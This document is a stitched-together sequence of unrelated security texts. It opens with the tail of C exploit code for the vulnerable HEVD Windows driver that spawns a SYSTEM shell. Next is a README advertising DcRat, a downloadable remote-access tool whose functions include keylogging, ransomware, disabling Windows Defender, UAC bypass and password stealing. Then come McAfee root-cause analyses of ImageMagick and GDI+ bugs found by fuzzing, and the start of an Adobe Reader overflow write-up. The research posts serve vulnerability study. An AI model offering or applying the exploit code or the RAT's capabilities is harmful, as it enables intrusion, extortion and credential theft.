    // Print update for NT AUTHORITY\SYSTEM shell
    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

    // Spawning an NT AUTHORITY\SYSTEM shell
    system("cmd.exe /c cmd.exe /K cd C:\\");
}

void main(void)
{
    // Open a handle to the driver
    printf("[+] Obtaining handle to HEVD.sys...\n");

    HANDLE drvHandle = CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        0x0,
        NULL,
        OPEN_EXISTING,
        0x0,
        NULL
    );

    // Error handling
    if (drvHandle == (HANDLE)-1)
    {
        printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
    }
    else
    {
        readwritePrimitive(drvHandle);
    }
}

DcRat - A Simple Remote Tool Written In C#


DcRat is a simple remote tool written in C#


Introduction

Features
  • TCP connection with certificate verification, stable and secure
  • Server IP and port can be retrieved through a link
  • Multi-server, multi-port support
  • Plugin system based on DLLs, which provides strong extensibility
  • Super tiny client size (about 40~50K)
  • Data transfer with msgpack (more compact than JSON and other text formats)
  • Logging system recording all events

Functions
  • Remote shell
  • Remote desktop
  • Remote camera
  • Registry Editor
  • File management
  • Process management
  • Netstat
  • Remote recording
  • Process notification
  • Send file
  • Inject file
  • Download and Execute
  • Send notification
  • Chat
  • Open website
  • Modify wallpaper
  • Keylogger
  • File lookup
  • DDOS
  • Ransomware
  • Disable Windows Defender
  • Disable UAC
  • Password recovery
  • Open CD
  • Lock screen
  • Client shutdown/restart/upgrade/uninstall
  • System shutdown/restart/logout
  • Bypass Uac
  • Get computer information
  • Thumbnails
  • Auto task
  • Mutex
  • Process protection
  • Block client
  • Install with schtasks
  • etc

Deployment
  • Build: Visual Studio 2019
  • Runtime:
    • Server: .NET Framework 4.6.1
    • Client and others: .NET Framework 4.0

Support
  • The following systems (32 and 64 bit) are supported
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

TODO
  • Password recovery and other stealers (only Chrome and Edge are supported now)
  • Reverse Proxy
  • Hidden VNC
  • Hidden RDP
  • Hidden Browser
  • Client Map
  • Real time Microphone
  • Some fun functions
  • Information Collection (maybe with UI)
  • Support unicode in Remote Shell
  • Support Folder Download
  • Support more ways to install Clients
  • ……

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.


Download

Press here to download the latest release.


Attention

I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of this software. You are fully responsible for any use of the software and acknowledge that it is intended for educational and research purposes only. By downloading the software or its source code, you automatically agree to the above.


Thanks


Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829

Introduction:

ImageMagick is hugely popular open source software that is used in a lot of systems around the world. It is available for Windows, Linux and macOS, as well as Android and iOS. It is used for editing, creating or converting various digital image formats and supports various formats like PNG, JPEG, WEBP, TIFF, HEIC and PDF, among others.

Google OSS Fuzz and other threat researchers have made ImageMagick the frequent focus of fuzzing, an extremely popular technique used by security researchers to discover potential zero-day vulnerabilities in open, as well as closed source software. This research has resulted in various vulnerability discoveries that must be addressed on a regular basis by its maintainers. Despite the efforts of many to expose such vulnerabilities, recent fuzzing research from McAfee has exposed new vulnerabilities involving processing of multiple image formats, in various open source and closed source software and libraries including ImageMagick and Windows GDI+.

Fuzzing ImageMagick:

Fuzzing open source libraries has been covered in a detailed blog “Vulnerability Discovery in Open Source Libraries Part 1: Tools of the Trade” last year. Fuzzing ImageMagick is very well documented, so we will be quickly covering the process in this blog post and will focus on the root cause analysis of the issue we have found.

Compiling ImageMagick with AFL:

ImageMagick has a lot of configuration options, which we can see by running the following command:

$ ./configure --help

We can customize various parameters as per our needs. To compile and install ImageMagick with AFL for our case, we can use the following commands:

$ CC=afl-gcc CXX=afl-g++ CFLAGS="-ggdb -O0 -fsanitize=address,undefined -fno-omit-frame-pointer" LDFLAGS="-ggdb -fsanitize=address,undefined -fno-omit-frame-pointer" ./configure

$ make -j$(nproc)

$sudo make install

This will compile and install ImageMagick with AFL instrumentation. The binary we will be fuzzing is “magick”, also known as “magick tool”. It has various options, but we will be using its image conversion feature to convert our image from one format to another.

A simple command would look like the following:

$ magick <input file> <output file>

This command will convert an input file to an output file format. We will be fuzzing this with AFL.

Collecting Corpus:

Before we start fuzzing, we need to have a good input corpus. One way of collecting a corpus is to search on Google or GitHub. We can also use existing test corpora from various software. A good test corpus is available on the AFL site here: https://lcamtuf.coredump.cx/afl/demo/

Minimizing Corpus:

Corpus collection is one thing, but we also need to minimize the corpus. The way AFL works is that it instruments each basic block so that it can trace the program execution path. It maintains a shared memory region as a bitmap and uses an algorithm to check for new block (edge) hits. If a new hit is found, it saves this information to the bitmap.
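
Conceptually, the instrumentation injected at each basic block updates that shared bitmap roughly like this (a simplified C sketch of the edge-coverage scheme described in AFL's own documentation; it is not ImageMagick or afl-gcc source):

// Simplified model of AFL's edge-coverage bookkeeping
#define MAP_SIZE 65536

unsigned char shared_bitmap[MAP_SIZE];   // shared memory region read by afl-fuzz
unsigned int  prev_location;             // per-execution state

void afl_log_block(unsigned int cur_location)    // cur_location: compile-time random block ID
{
    shared_bitmap[(cur_location ^ prev_location) % MAP_SIZE]++;  // record the (prev -> cur) edge
    prev_location = cur_location >> 1;   // shift so that A->B and B->A map to different entries
}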

Now, it may be possible that more than one input file from the corpus triggers the same path; since we have collected sample files from various sources, we don’t have any information on which paths they will trigger at runtime. If we use this corpus without removing such files, we end up wasting time and CPU cycles, which we want to avoid.

Interestingly AFL offers a utility called “afl-cmin” which we can use to minimize our test corpus. This is a recommended thing to do before you start any fuzzing campaign. We can run this as follows:

$afl-cmin -i <input directory> -o <output directory> -- magick @@ /dev/null

This command will minimize the input corpus and will keep only those files which trigger unique paths.

Running Fuzzers:

After we have minimized the corpus, we can start fuzzing. To fuzz, we need to use the following command:

$afl-fuzz -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

This will only run a single instance of AFL utilizing a single core. If we have a multicore processor, we can run multiple instances of AFL, with one master and n slaves, where n is the number of available CPU cores.

To check available CPU cores, we can use this command:

$nproc

This will give us the number of CPU cores (depending on the system) as follows:

In this case there are eight cores. So, we can run one Master and up to seven Slaves.

To run the master instance, we can use the following command:

$afl-fuzz -M Master -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

We can run slave instances using the following commands:

$afl-fuzz -S Slave1 -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

$afl-fuzz -S Slave2 -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

The same can be done for each slave. We just need to use an argument -S and can use any name like slave1, slave2, etc.

Results:

Within a few hours of beginning this fuzzing campaign, we found one crash related to an out-of-bounds read in heap memory. We reported this issue to ImageMagick, and they were very prompt in fixing it with a patch the very next day. ImageMagick has released a new build, version 7.0.46, to fix this issue. This issue was assigned CVE-2020-27829.

Analyzing CVE-2020-27829:

On checking the POC file, we found that it was a TIFF file.

When we open this file with ImageMagick using the following command:

$magick poc.tif /dev/null

As a result, we see a crash like below:

As is clear from the above log, the program was trying to read 1 byte past the allocated heap buffer, and therefore ASAN caused this crash. At the very least, this can lead to an ImageMagick crash on systems running a vulnerable version of ImageMagick.

Understanding TIFF file format:

Before we start debugging this issue to find a root cause, it is necessary to understand the TIFF file format. Its specification is very well described here: http://paulbourke.net/dataformats/tiff/tiff_summary.pdf.

In short, a TIFF file has three parts:

  1. Image File Header (IFH) – Contains information such as the file identifier, version, and offset of the IFD (modelled in the sketch after this list).
  2. Image File Directory (IFD) – Contains information on the height, width, and depth of the image, the number of colour planes, etc. It also contains various TAGs like ColorMap, PageNumber, BitsPerSample, FillOrder, etc.
  3. Bitmap data – Contains various image data like strips, tiles, etc.
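
For reference, the Image File Header at the very start of a TIFF file can be modelled with a small structure like the one below (a sketch based on the specification linked above; the type and field names are ours, not libtiff's):

#include <stdint.h>

// TIFF Image File Header (IFH) - the first 8 bytes of every TIFF file
typedef struct {
    uint16_t byte_order;   // 0x4949 ("II", little-endian) or 0x4D4D ("MM", big-endian)
    uint16_t magic;        // always 42 (0x002A)
    uint32_t ifd_offset;   // file offset of the first Image File Directory (0xa0 in this POC)
} tiff_ifh_t;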

We can use the tiffinfo utility from libtiff to gather various information about the POC file. This allows us to see information such as the width, height, samples per pixel, rows per strip, etc.:

There are a few things to note here:

  • TIFF Dir offset is: 0xa0
  • Image width is: 3 and length is: 32
  • Bits per sample is: 9
  • Samples per pixel is: 3
  • Rows per strip is: 1024
  • Planar configuration is: single image plane

We will be using this data moving forward in this post.

Debugging the issue:

As we can see in the crash log, the program was crashing in the function “PushQuantumPixel”, at the following location in quantum-import.c, line 256:

On checking the “PushQuantumPixel” function in “MagickCore/quantum-import.c”, we can see the following code at line #256, where the program is crashing:

We can see the following:

  • “pixels” seems to be a character array
  • inside a for loop its value is being read and it is being assigned to quantum_info->state.pixel
  • its address is increased by one in each loop iteration

The program is crashing at this location while reading the value of “pixels”, which means that the value being read is out of bounds of the allocated heap memory.

Now we need to figure out the following:

  1. What is “pixels” and what data does it contain?
  2. Why is it crashing?
  3. How was this fixed?

Finding root cause:

To start with, we can check the “ReadTIFFImage” function in the coders/tiff.c file and see that it allocates memory using an “AcquireQuantumMemory” function call, which is documented here:

https://imagemagick.org/api/memory.php:

“Returns a pointer to a block of memory at least count * quantum bytes suitably aligned for any use.

The format of the “AcquireQuantumMemory” method is:

void *AcquireQuantumMemory(const size_t count,const size_t quantum)

A description of each parameter follows:

count

the number of objects to allocate contiguously.

quantum

the size (in bytes) of each object. “

In this case, the two parameters passed to this function are “extent” and “sizeof(*strip_pixels)”.

We can see that “extent” is calculated as follows in the code below:

There is a function, TIFFStripSize(tiff), which returns the size of a strip of data, as mentioned in the libtiff documentation here:

http://www.libtiff.org/man/TIFFstrip.3t.html

In our case, it returns 224. We can also see in the code above that “image->columns * sizeof(uint64)” is added to extent, which adds another 24 bytes, so the extent value becomes 248.

So, this extent value of 248 and sizeof(*strip_pixels), which is 1, are passed to the “AcquireQuantumMemory” function, and a total of 248 bytes of memory gets allocated.
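
Plugging the POC file's values into that calculation gives the allocation size (a small, self-contained sketch of the arithmetic; extent and strip_pixels are the names used in coders/tiff.c as discussed above):

#include <stdio.h>

int main(void)
{
    size_t strip_size = 224;                                  // TIFFStripSize(tiff) for this image
    size_t columns    = 3;                                    // image->columns
    size_t extent     = strip_size + columns * sizeof(unsigned long long); // 224 + 24 = 248

    // AcquireQuantumMemory(extent, sizeof(*strip_pixels)) -> 248 * 1 = 248 bytes
    printf("extent = %zu bytes\n", extent);
    return 0;
}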

This is how memory is allocated.

“strip_pixels” is a pointer to the newly allocated memory.

Note that this is 248 bytes of newly allocated memory. Since we are using ASAN, each byte will contain “0xbe”, which is ASAN’s default fill value for newly allocated memory:

https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_flags.inc

The memory start location is 0x6110000002c0 and the end location is 0x6110000003b7, which is 248 bytes total.

This memory is set to 0 by a “memset” call and is assigned to a variable “p”, as shown in the image below. Please also note that “p” will be used as a pointer to traverse this memory region going forward in the program:

Later on, we see that there is a call to “TIFFReadEncodedPixels”, which reads strip data from the TIFF file and stores it in the newly allocated 248-byte buffer “strip_pixels” (documentation here: http://www.libtiff.org/man/TIFFReadEncodedStrip.3t.html):

To understand what this TIFF file data is, we need to again refer to the TIFF file structure. We can see that there is a tag called “StripOffsets” whose value is 8, which specifies the offset of the strip data inside the TIFF file:

We see the following when we check data at offset 8 in the TIFF file:

We see the following when we print the data in “strip_pixels” (note that it is in little endian format):

So “strip_pixels” contains the actual data from the TIFF file, starting at offset 8. It will be traversed through the pointer “p”.

Inside the “ReadTIFFImage” function there are two nested for loops.

  • The first “for loop” is responsible for iterating “samples_per_pixel” times, which is 3.
  • The second “for loop” is responsible for iterating over the pixel data “image->rows” times, which is 32. This second loop executes 32 times, or the number of rows in the image, irrespective of the allocated buffer size.
  • Inside this second for loop, we can see something like this:

  • We can notice that the “ImportQuantumPixels” function uses the “p” pointer to read data from “strip_pixels”, and after each call to “ImportQuantumPixels” the value of “p” is increased by “stride”.

Here “stride” is calculated by calling the “TIFFVStripSize()” function, which, per the documentation, returns the number of bytes in a strip with nrows rows of data. In this case it is 14. So, on every iteration of the second for loop, the pointer “p” is incremented by 14 (0xE).

If we print the image structure, which is passed to the “ImportQuantumPixels” function as a parameter, we can see the following:

Here we can see that the columns value is 3, the rows value is 32, and the depth is 9. If we check the POC TIFF file, these are taken from the ImageWidth, ImageLength, and BitsPerSample values:

Ultimately, control reaches “ImportRGBQuantum” and then the “PushQuantumPixel” function, and one of the arguments to this function is the pixel data pointed to by “p”. Remember that this points to the memory previously allocated using the “AcquireQuantumMemory” function, that its length is 248 bytes, and that “p” is increased by 14 on each iteration.

The “PushQuantumPixel” function is used to read pixel data from “p” into ImageMagick’s internal pixel data storage. There is a for loop which is responsible for reading data from the provided pixels array of 248 bytes into a “quantum_info” structure. This loop reads data from pixels incrementally and saves it in the “quantum_info->state.pixel” field.

The root cause here is that there are no proper bounds checks, and the program tries to read data beyond the allocated heap buffer while reading the strip data inside a for loop.

This causes a crash in ImageMagick as we can see below:

Root cause

Therefore, to summarize, the program crashes because:

  1. The program allocates 248 bytes of memory to process the image’s strip data; a pointer “p” points to this memory.
  2. Inside a for loop, this pointer is increased by 14 (0xE) once for each row in the image, which in this case is 32 rows.
  3. Based on this calculation, 32*14=448 bytes or more of memory are required, but only 248 bytes were actually allocated.
  4. The program tries to read data assuming the total memory is 448+ bytes, but only 248 bytes are available, which causes an out-of-bounds memory read.
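To make the arithmetic concrete, here is a tiny standalone model of it (the numbers are the values observed for the POC as described above; this is only an illustration, not ImageMagick code):

#include <cstddef>
#include <cstdint>
#include <cstdio>

int main() {
    // Values observed for the POC TIFF file, as described above.
    const size_t tiffStripSize = 224;  // TIFFStripSize(tiff)
    const size_t columns       = 3;    // image->columns
    const size_t rows          = 32;   // image->rows
    const size_t stride        = 14;   // TIFFVStripSize(), added to "p" on every row

    const size_t allocated = tiffStripSize + columns * sizeof(uint64_t);  // 224 + 24 = 248 bytes
    const size_t traversed = rows * stride;                               // 32 * 14  = 448 bytes

    std::printf("allocated=%zu traversed=%zu out-of-bounds=%zu bytes\n",
                allocated, traversed, traversed - allocated);
    return 0;
}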

How was it fixed?

If we check the patch diff, we can see that the following changes were made to fix this issue:

Here the second argument to “AcquireQuantumMemory” is multiplied by 2, increasing the total amount of memory and preventing this out-of-bounds read from heap memory. The total memory allocated is now 248*2=496 bytes, as we can see below:

Another issue with the fix:

A new version of ImageMagick, 7.0.46, was released to fix this issue. While the patch fixes the memory allocation issue, if we check the code below we can see that the accompanying memset call didn’t zero the proper amount of memory.

Memory was allocated as extent*2*sizeof(*strip_pixels), but the memset only zeroed extent*sizeof(*strip_pixels). This means half of the memory was set to 0 and the rest still contained 0xbebebebe, ASAN’s default fill for newly allocated memory.
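The mismatch can be modeled with a short standalone snippet (malloc and memset stand in for the patched allocation and zeroing; this is only an illustration, not the actual ImageMagick code):

#include <cstdlib>
#include <cstring>

int main() {
    const size_t extent = 248;  // value computed for the POC, as described earlier

    // Patched allocation size: extent * 2 * sizeof(*strip_pixels) = 496 bytes.
    unsigned char *strip_pixels =
        (unsigned char *)std::malloc(extent * 2 * sizeof(*strip_pixels));
    if (strip_pixels == nullptr)
        return 1;

    // But only extent * sizeof(*strip_pixels) = 248 bytes are zeroed, leaving
    // bytes [248, 496) with whatever the allocator put there (0xbe under ASAN).
    std::memset(strip_pixels, 0, extent * sizeof(*strip_pixels));

    std::free(strip_pixels);
    return 0;
}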

This has since been fixed in subsequent releases of ImageMagick by using extent=2*TIFFStripSize(tiff); in the following patch:

https://github.com/ImageMagick/ImageMagick/commit/a5b64ccc422615264287028fe6bea8a131043b59#diff-0a5eef63b187504ff513056aa8fd6a7f5c1f57b6d2577a75cff428c0c7530978

Conclusion:

Processing image files requires a deep understanding of many file formats, so it is possible that something is implemented incorrectly or missed. This can lead to vulnerabilities in image processing software; some of these vulnerabilities can lead to DoS, while others can lead to remote code execution affecting every installation of such popular software.

Fuzzing plays an important role in finding vulnerabilities often missed by developers and during testing. We at McAfee constantly fuzz various closed source as well as open source software to help secure it. We work very closely with vendors and practice responsible disclosure. This reflects McAfee’s commitment to securing software and protecting our customers from various threats.

We will continue to fuzz various software and work with vendors to help mitigate risk arising from such threats.

We would like to thank the ImageMagick team for quickly resolving this issue within 24 hours and releasing a new version with the fix.

The post Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829 appeared first on McAfee Blog.

Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+

Introduction

Microsoft Windows Graphics Device Interface+, also known as GDI+, allows various applications to use graphics functionality on video displays as well as printers. Windows applications don’t access graphics hardware or device drivers directly; instead they interact with GDI, which in turn interacts with the device drivers. In this way, GDI provides an abstraction layer for Windows applications and a common set of APIs for everyone to use.

Because of the complexity of the formats it handles, GDI+ has a known history of vulnerabilities. We at McAfee continuously fuzz various open source and closed source software, including Windows GDI+. Over the last few years, we have reported various issues to Microsoft in Windows components including GDI+ and have received CVEs for them.

In this post, we detail our root cause analysis of one such vulnerability which we found using WinAFL: CVE-2021-1665 – GDI+ Remote Code Execution Vulnerability. This issue was fixed as part of a January 2021 Microsoft patch.

What is WinAFL?

WinAFL is a Windows port of the popular Linux AFL fuzzer and is maintained by Ivan Fratric of Google Project Zero. WinAFL performs dynamic binary instrumentation using DynamoRIO, and it requires a program called a harness. A harness is simply a small program which calls the APIs we want to fuzz.

A simple harness for this is already provided with WinAFL; we can enable the “Image->GetThumbnailImage” code, which is commented out by default. Following is the harness code to fuzz GDI+ image loading and the GetThumbnailImage API:
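For reference, a minimal sketch of such a harness is shown below. It assumes the standard GDI+ C++ API; names such as fuzzMe are illustrative and the code actually shipped with WinAFL may differ slightly.

#include <windows.h>
#include <gdiplus.h>

#pragma comment(lib, "gdiplus.lib")

using namespace Gdiplus;

// The wrapper WinAFL targets for in-memory fuzzing (two arguments, matching -nargs 2).
extern "C" __declspec(dllexport) int fuzzMe(const wchar_t *inputFile, const wchar_t *unused)
{
    UNREFERENCED_PARAMETER(unused);

    Image *image = new Image(inputFile);
    if (image != NULL && image->GetLastStatus() == Ok) {
        // The API under test: build a thumbnail from the attacker-controlled image.
        Image *thumbnail = image->GetThumbnailImage(100, 100, NULL, NULL);
        delete thumbnail;
    }
    delete image;
    return 0;
}

int wmain(int argc, wchar_t **argv)
{
    if (argc < 2)
        return 1;

    GdiplusStartupInput startupInput;
    ULONG_PTR token = 0;
    GdiplusStartup(&token, &startupInput, NULL);

    fuzzMe(argv[1], NULL);

    GdiplusShutdown(token);
    return 0;
}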

 

As you can see, this small piece of code simply creates a new image object from the provided input file and then calls another function to generate a thumbnail image. This makes for an excellent attack vector and can affect various Windows applications if they use thumbnail images. In addition, this requires little user interaction; thus any software which uses GDI+ and calls the GetThumbnailImage API may be affected.

Collecting Corpus:

A good corpus provides a sound foundation for fuzzing. To build one, we can use Google or GitHub, in addition to test corpora available from various software and public EMF files released for other vulnerabilities. We also generated a few test files by modifying sample code provided on Microsoft’s site which generates an EMF file with EmfPlusDrawString and other records:

Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emfplus/07bda2af-7a5d-4c0b-b996-30326a41fa57

Minimizing Corpus:

After we have collected an initial corpus, we need to minimize it. For this we can use a utility called winafl-cmin.py as follows:

winafl-cmin.py -D D:\\work\\winafl\\DynamoRIO\\bin32 -t 10000 -i inCorpus -o minCorpus -covtype edge -coverage_module gdiplus.dll -target_module gdiplus_hardik.exe -target_method fuzzMe -nargs 2 -- gdiplus_hardik.exe @@

How does WinAFL work?

WinAFL uses the concept of in-memory fuzzing. We provide a function name to WinAFL; it saves the program state at the start of that function, takes one input file from the corpus, mutates it, and feeds it to the function.

It then monitors the run for any new code paths or crashes. If it finds a new code path, it considers the new file an interesting test case and adds it to the queue for further mutation. If it finds a crash, it saves the crashing file in the crashes folder.

The following picture shows the fuzzing flow:

Fuzzing with WinAFL:

Once we have compiled our harness program and collected and minimized the corpus, we can run this command to fuzz our program with WinAFL:

afl-fuzz.exe -i minCorpus -o out -D D:\work\winafl\DynamoRIO\bin32 -t 20000 -coverage_module gdiplus.dll -fuzz_iterations 5000 -target_module gdiplus_hardik.exe -target_offset 0x16e0 -nargs 2 -- gdiplus_hardik.exe @@

Results:

We found a few crashes; after triaging the unique ones, we found a crash in “gdiplus!BuiltLine::GetBaselineOffset” which looks as follows in the call stack below:

As can be seen in the above image, the program is crashing while trying to read data from a memory address pointed to by edx+8. We can see that the registers ebx, ecx, and edx contain c0c0c0c0, which means that page heap is enabled for the binary. We can also see that c0c0c0c0 is being passed as a parameter to the “gdiplus!FullTextImager::RenderLine” function.

Patch Diffing to See If We Can Find the Root Cause

To figure out the root cause, we can use patch diffing; namely, we can use the IDA BinDiff plugin to identify what changes have been made in the patched file. If we are lucky, we can easily find the root cause by just looking at the code that was changed. So, we can generate IDB files for the patched and unpatched versions of gdiplus.dll and then run the IDA BinDiff plugin to see the changes.

We can see that one new function was added in the patched file, and it seems to be a destructor for the BuiltLine object:

We can also see that there are a few functions where the similarity score is < 1; one such function is FullTextImager::BuildAllLines, as shown below:

Now, to confirm that this function is really the one which was patched, we can run our test program and POC in WinDbg and set a breakpoint on this function. We can see that the breakpoint is hit and the program doesn’t crash anymore:

As a next step, we need to identify what has been changed in this function to fix this vulnerability. For that we can check the flow graph of the function, which looks as follows. Unfortunately, there are too many changes to identify the vulnerability by simply looking at the diff:

The left side shows the unpatched DLL, while the right side shows the patched DLL:

  • Green indicates that the patched and unpatched blocks are the same.
  • Yellow blocks indicate that some changes were made between the unpatched and patched DLLs.
  • Red blocks call out differences between the DLLs.

If we zoom in on the yellow blocks, we can see the following:

We can note several changes. A few blocks are removed in the patched DLL, so patch diffing alone will not be sufficient to identify the root cause of this issue. However, it provides valuable hints about where to look and what to look for when using other debugging methods such as WinDbg. A few observations we can make from the BinDiff output above:

  • In the unpatched DLL, if we check carefully, we can see that there is a call to the “GetUntrimmedCharacterCount” function and later on there is another call to the function “SetSpan::SpanVector”.
  • In the patched DLL, we can see that there is a call to “GetUntrimmedCharacterCount” where the return value, stored in the EAX register, is checked. If it is zero, control jumps to another location: a destructor for the BuiltLine object, which is the newly added code in the patched DLL:

So we can assume that this is where the vulnerability was fixed. Now we need to figure out the following:

  1. Why does our program crash with the provided POC file?
  2. Which field in the file is causing the crash?
  3. What value of that field triggers the crash?
  4. Which condition in the program causes the crash?
  5. How was this fixed?

EMF File Format:

EMF, also known as the Enhanced Metafile Format, is used to store graphical images in a device-independent manner. An EMF file consists of various variable-length records. It can contain definitions of various graphics objects, drawing commands, and other graphics properties.

Credit: MS EMF documentation.

Generally, an EMF file consists of the following records:

  1. EMF Header – contains information about the EMF structure.
  2. EMF Records – variable-length records containing information about graphics properties, drawing order, and so forth.
  3. EMF EOF Record – the last record in the EMF file.

The detailed specification of the EMF file format can be found on Microsoft’s site at the following URL:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emf/91c257d7-c39d-4a36-9b1f-63e3f73d30ca

Locating the Vulnerable Record in the EMF File:

Generally, most of the issues in EMF are caused by malformed or corrupt records. We need to figure out which record type is causing this crash. If we look at the call stack, we can see the following:

We can notice a call to the function “gdiplus!GdipPlayMetafileRecordCallback”.

By setting a breakpoint on this function and checking its parameters, we can see the following:

We can see that EDX contains a memory address, and that the parameters given to this function are 0x00401c, 0x00000000, and 0x00000044.

Also, on checking the location pointed to by EDX, we can see the following:

If we check our POC EMF file, we can see that this data comes from the file at offset 0x15c:

By going through the EMF specification and manually parsing the records, we can easily figure out that this is an “EmfPlusDrawString” record, the format of which is shown below:
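A sketch of the record’s fixed-size fields, based on the MS-EMFPLUS specification (illustrative only; StringData follows the fixed fields as a variable-length UTF-16 string):

#include <cstdint>

#pragma pack(push, 1)
struct EmfPlusDrawString {
    uint16_t Type;          // 0x401C identifies an EmfPlusDrawString record
    uint16_t Flags;
    uint32_t Size;          // total record size (0x50 in the POC)
    uint32_t DataSize;      // size of the record data (0x44 in the POC)
    uint32_t BrushId;
    uint32_t FormatID;
    uint32_t Length;        // number of UTF-16 characters in StringData (0x14 in the POC)
    float    LayoutRect[4]; // x, y, width, height
    // Followed by: uint16_t StringData[Length]; (variable length)
};
#pragma pack(pop)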

In our case:

Record Type = 0x401c EmfPlusDrawString record

Flags = 0x0000

Size = 0x50

Data size = 0x44

Brushid = 0x02

Format id = 0x01

Length = 0x14

Layoutrect = 00 00 00 00 00 00 00 00 FC FF C7 42 00 00 80 FF

String data =

Now that we have located the record that seems to be causing the crash, the next thing is to figure out why our program is crashing. If we debug and check the code, we can see that control reaches the function “gdiplus!FullTextImager::BuildAllLines”. When we decompile this code, we see something like this:

The following diagram shows the function call hierarchy:

The execution flow in summary:

  1. Inside the “FullTextImager::BuildAllLines” function there is a while loop in which the program allocates 0x60 bytes of memory. Then it calls “BuiltLine::BuiltLine”.
  2. The “BuiltLine::BuiltLine” function moves data into the newly allocated memory and then calls “BuiltLine::GetUntrimmedCharacterCount”.
  3. The return value of “BuiltLine::GetUntrimmedCharacterCount” is added to the loop counter, which is held in ECX. This process repeats as long as the loop counter (ECX) is less than the string length (EAX), which is 0x14 here.
  4. The loop counter starts at 0, so the loop should terminate after 0x13, or when the return value of “GetUntrimmedCharacterCount” is 0.
  5. But in the vulnerable DLL, the loop doesn’t terminate as expected because of the way the loop counter is increased. Here, “BuiltLine::GetUntrimmedCharacterCount” returns 0, which is added to the loop counter (ECX) and therefore doesn’t increase its value. The program allocates another 0x60 bytes of memory and creates another line, corrupting data that later causes the crash. The loop is executed 21 times instead of 20.

In detail:

1. Inside “FullTextImager::BuildAllLines”, 0x60 (96) bytes of memory are allocated; in the debugger it looks as follows:

2. Then the “BuiltLine::BuiltLine” function is called, which moves the data into the newly allocated memory:

3. This happens inside a while loop, and there is a function call to “BuiltLine::GetUntrimmedCharacterCount”.

4. The return value of “BuiltLine::GetUntrimmedCharacterCount” is stored at location 0x12ff2ec. This value will be 1, as can be seen below:

5. This value gets added to ECX:

6. Then there is a check that determines whether ECX < EAX. If true, the loop continues; otherwise it jumps to another location:

7. Now, in the vulnerable version, the loop doesn’t exit if the return value of “BuiltLine::GetUntrimmedCharacterCount” is 0: the 0 is added to ECX, so ECX does not increase. The loop therefore executes one more time, with an ECX value of 0x13, leading to the loop being executed 21 times rather than 20. This is the root cause of the problem.
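The counter logic can be modeled with a small standalone snippet (purely illustrative; the stub below simply pretends that the 20th call returns 0, which is what the POC triggers):

#include <cstdio>

// Toy stand-in for BuiltLine::GetUntrimmedCharacterCount: one character per call,
// except for one call that returns 0 (as happens with the POC).
static unsigned int GetUntrimmedCharacterCount(int call)
{
    return (call == 19) ? 0 : 1;
}

int main()
{
    const unsigned int stringLength = 0x14;  // EAX: Length field of the EmfPlusDrawString record
    unsigned int count = 0;                  // ECX: characters consumed so far
    int linesBuilt = 0;

    // Each pass models one 0x60-byte BuiltLine allocation.
    for (int call = 0; count < stringLength && call < 64; call++) {
        linesBuilt++;
        count += GetUntrimmedCharacterCount(call);  // a 0 return leaves the counter unchanged
    }

    std::printf("lines built: %d (20 expected, 21 because of the unchecked 0 return)\n", linesBuilt);
    return 0;
}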

Also, after some debugging, we can figure out why EAX contains 0x14. It is read from the POC file at offset 0x174:

If we recall, this is the EmfPlusDrawString record and 0x14 is the length we mentioned before.

Later on, the program reaches the “FullTextImager::Render” function, corrupting the value of EAX because it reads the unused memory:

This value is then passed as an argument to the “FullTextImager::RenderLine” function:

Later, the program crashes while trying to access this location.

To summarize: the program was crashing while processing the EmfPlusDrawString record inside the EMF file, accessing an invalid memory location while processing the string data field. The program was not verifying the return value of the “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function, and this resulted in taking a program path that corrupted registers and various memory values, ultimately causing the crash.

How was this issue fixed?

As we figured out by looking at the patch diff above, a check was added on the return value of the “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function.

If the returned value is 0, the program XORs EBX, which contains the counter, and jumps to a location which calls the destructor for the BuiltLine object:

Here is the destructor that prevents the issue:

Conclusion:

GDI+ is a very commonly used Windows component, and a vulnerability like this can affect billions of systems across the globe. We recommend that users apply the proper updates and keep their Windows deployments current.

We at McAfee continuously fuzz various open source and closed source libraries and work with vendors to fix such issues, responsibly disclosing them and giving vendors adequate time to fix the issue and release updates as needed.

We are thankful to Microsoft for working with us on fixing this issue and releasing an update.

The post Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+ appeared first on McAfee Blog.

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC prior to version 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in copying twice the number of bytes of the source ANSI string (the relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-21017

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

